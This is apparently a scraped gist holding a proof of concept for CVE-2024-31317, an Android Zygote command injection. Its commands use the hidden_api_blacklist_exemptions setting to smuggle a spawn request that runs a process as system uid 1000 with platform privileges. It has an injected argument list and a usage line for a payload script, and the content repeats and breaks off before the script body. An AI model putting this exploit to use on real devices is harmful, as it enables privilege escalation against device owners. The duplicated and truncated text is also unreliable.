264312431

## gist:db3f3595139556c773fb94b7cbe668b5
am force-stop com.android.settings
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003

## payload.sh
#!/bin/sh
# PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317:
# https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html
#
# USAGE (android 13, with pre-13 use 12200 instead of 32768):
#    host$ adb push payload.sh /sdcard/
#    host$ adb shell
#   shell$ logcat -c; settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 \
#          --runtime-args --setuid=1000 --setgid=1000 --runtime-flags=16787456 --mount-external-default --target-sdk-version=22 \
#          --setgroups=3003 --nice-name=com.android.settings --seinfo=platform:privapp:targetSdkVersion=33:complete \
	am force-stop com.android.settings
	settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
	15
	--runtime-args
	--setuid=1000
	--setgid=1000
	--runtime-flags=2049
	--mount-external-full
	--target-sdk-version=29
	--setgroups=3003
	#!/bin/sh
	# PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317:
	# https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html
	#
	# USAGE (android 13, with pre-13 use 12200 instead of 32768):
	# host$ adb push payload.sh /sdcard/
	# host$ adb shell
	# shell$ logcat -c; settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 \
	# --runtime-args --setuid=1000 --setgid=1000 --runtime-flags=16787456 --mount-external-default --target-sdk-version=22 \
	# --setgroups=3003 --nice-name=com.android.settings --seinfo=platform:privapp:targetSdkVersion=33:complete \